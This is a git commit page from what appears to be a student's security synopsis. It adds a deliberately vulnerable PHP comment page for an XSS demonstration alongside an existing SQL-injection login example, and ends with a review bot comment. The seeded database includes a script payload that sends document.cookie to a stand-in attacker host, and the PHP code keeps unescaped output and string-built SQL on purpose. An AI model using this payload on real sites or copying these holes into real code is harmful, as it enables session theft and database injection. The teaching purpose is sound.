author | Marcin Zelent <zelent.marcin@gmail.com> | 2018-05-30 17:56:40 +0200 |
---|---|---|
committer | Marcin Zelent <zelent.marcin@gmail.com> | 2018-05-30 17:56:40 +0200 |
commit | 7b2e079f4ef3cd3f16c6c5ca30fc3e97fd982b28 (patch) | |
tree | d12bc36051319010fb475a202ad0c97315af0529 | |
parent | bf3c141f3c318b45b1f43d962623587ac26a92a2 (diff) |
Added XSS example
-rw-r--r-- | synopsis.tex | 80 | ||||
-rw-r--r-- | xss/comments.db | bin | 0 -> 8192 bytes | |||
-rw-r--r-- | xss/index.php | 36 |
3 files changed, 105 insertions, 11 deletions
diff --git a/synopsis.tex b/synopsis.tex index 0c8a520..e844895 100644 --- a/synopsis.tex +++ b/synopsis.tex @@ -612,7 +612,7 @@ continue studying it in the future. \appendix \section{SQL injection example} -\subsection{HTML code} +\subsection{index.html} \begin{minted}{html} <!DOCTYPE HTML> <html> @@ -642,7 +642,7 @@ input { \end{minted} \newpage -\subsection{PHP code} +\subsection{login.php} \begin{minted}{php} <?php class MyDB extends SQLite3 { @@ -651,27 +651,25 @@ input { } } - if(isset($_POST['email'], $_POST['pass'])) - { + if (isset($_POST['email'], $_POST['pass'])) { $email = $_POST['email']; $pass = $_POST['pass']; $db = new MyDB(); - $sql = 'SELECT * FROM Users WHERE email=\''.$email. - '\' AND password=\''.$pass.'\''; - + $sql = 'SELECT * FROM Users WHERE email=\'' . $email . + '\' AND password=\'' . $pass . '\''; $ret = $db->query($sql); - while($row = $ret->fetchArray(SQLITE3_ASSOC)) { - echo 'Logged in as '.$row['email'].'<br>'; - } + while ($row = $ret->fetchArray(SQLITE3_ASSOC)) + echo 'Logged in as ' . $row['email'] . '<br>'; + $db->close(); } ?> \end{minted} \newpage -\subsection{SQL code} +\subsection{users.db} \begin{minted}{sql} CREATE TABLE Users ( email varchar(32), 
@@ -683,4 +681,64 @@ INSERT INTO Users VALUES('marcin@mail.com','pass'); \end{minted} \newpage +\appendix +\section{Cross-Site Scripting (XSS) example} + +\subsection{index.php} +\begin{minted}{php} +<?php + class MyDB extends SQLite3 { + function __construct() { + $this->open('comments.db'); + } + } + + if (isset($_POST['user'], $_POST['comment'])) { + $user = $_POST['user']; + $comment = $_POST['comment']; + + $db = new MyDB(); + + $sql = 'INSERT INTO Comments VALUES(\'' . $user . '\',\'' . + $comment . '\')'; + $ret = $db->exec($sql); + $db->close(); + } + + echo '<!DOCTYPE HTML><html><head><title>Comments</title>' . + '<meta charset="utf-8"></head><body><h1>Comments</h1>'; + + $db = new MyDB(); + + $sql = 'SELECT * FROM Comments'; + $ret = $db->query($sql); + while ($row = $ret->fetchArray(SQLITE3_ASSOC)) + echo '<p><b>' . $row['user'] . '</b> says:<br>' . + $row['comment'] . '</p>'; + + $db->close(); + + echo '<h2>Add comment</h1><form action="index.php" method="post">' . + '<input type="text" name="user" placeholder="User name"><br>' . + '<input type="text" name="comment" placeholder="Comment"><br>' . + '<input type="submit" value="Add"><br>' . + '</form></body></html>'; +?> +\end{minted} +\newpage + +\subsection{comments.db} +\begin{minted}{sql} +CREATE TABLE Comments( + user varchar(32), + comment varchar(255) +); + +INSERT INTO Comments VALUES('user1','Hello world!'); +INSERT INTO Comments VALUES('user2','test'); +INSERT INTO Comments VALUES('attacker','hello +<script>document.createElement("img").src = +"http://attackerswebsite.com/" + document.cookie</script>'); +\end{minted} + \end{document} diff --git a/xss/comments.db b/xss/comments.db Binary files differnew file mode 100644 index 0000000..32114c2 --- /dev/null +++ b/xss/comments.db diff --git a/xss/index.php b/xss/index.php new file mode 100644 index 0000000..e645517 --- /dev/null +++ b/xss/index.php 
@@ -0,0 +1,36 @@
+<?php
+ class MyDB extends SQLite3 {
+ function __construct() {
+ $this->open('comments.db');
+ }
+ }
+
+ if (isset($_POST['user'], $_POST['comment'])) {
+ $user = $_POST['user'];
+ $comment = $_POST['comment'];
+
+ $db = new MyDB();
+
+ $sql = 'INSERT INTO Comments VALUES(\'' . $user . '\',\'' . $comment . '\')';
+ $ret = $db->exec($sql);
+ $db->close();
+ }
+
+ echo '<!DOCTYPE HTML><html><head><title>Comments</title>' .
+ '<meta charset="utf-8"></head><body><h1>Comments</h1>';
+
+ $db = new MyDB();
+
+ $sql = 'SELECT * FROM Comments';
+ $ret = $db->query($sql);
+ while ($row = $ret->fetchArray(SQLITE3_ASSOC))
+ echo '<p><b>' . $row['user'] . '</b> says:<br>' . $row['comment'] . '</p>';
+
+ $db->close();
+
+ echo '<h2>Add comment</h1><form action="index.php" method="post">' .
+ '<input type="text" name="user" placeholder="User name"><br>' .
+ '<input type="text" name="comment" placeholder="Comment"><br>' .
+ '<input type="submit" value="Add"><br>' .
+ '</form></body></html>';
+?> |
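Review bot: The INSERT at `$sql = 'INSERT INTO Comments VALUES(\'' . $user . '\',\'' . $comment . '\')';` concatenates the raw POST fields, so this stored-XSS example is also a SQL-injection sink, and any comment containing a single quote (e.g. `alert('x')`) makes `$db->exec` fail while the ignored `$ret` hides the error. Switching the write path to a prepared statement keeps the demo focused on the one vulnerability it is meant to show and lets arbitrary script payloads be stored. The unescaped `echo '<p><b>' . $row['user'] . '</b> says:<br>' . $row['comment'] . '</p>';` is presumably the intentional sink; a comment such as `// Deliberately unescaped: stored XSS sink — the fix is htmlspecialchars($row['comment'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')` would make that explicit for readers of the example. Separately, `<h2>Add comment</h1>` closes the wrong tag.
```php
if (isset($_POST['user'], $_POST['comment'])) {
    // … unchanged: read $user / $comment, open $db …
    // Parameterised so the stored-XSS demo is not also a SQL-injection sink
    $stmt = $db->prepare('INSERT INTO Comments VALUES(:user, :comment)');
    $stmt->bindValue(':user', $user, SQLITE3_TEXT);
    $stmt->bindValue(':comment', $comment, SQLITE3_TEXT);
    $stmt->execute();
    $db->close();
}
// … unchanged: page rendering, deliberately unescaped echo of $row['comment'] …
```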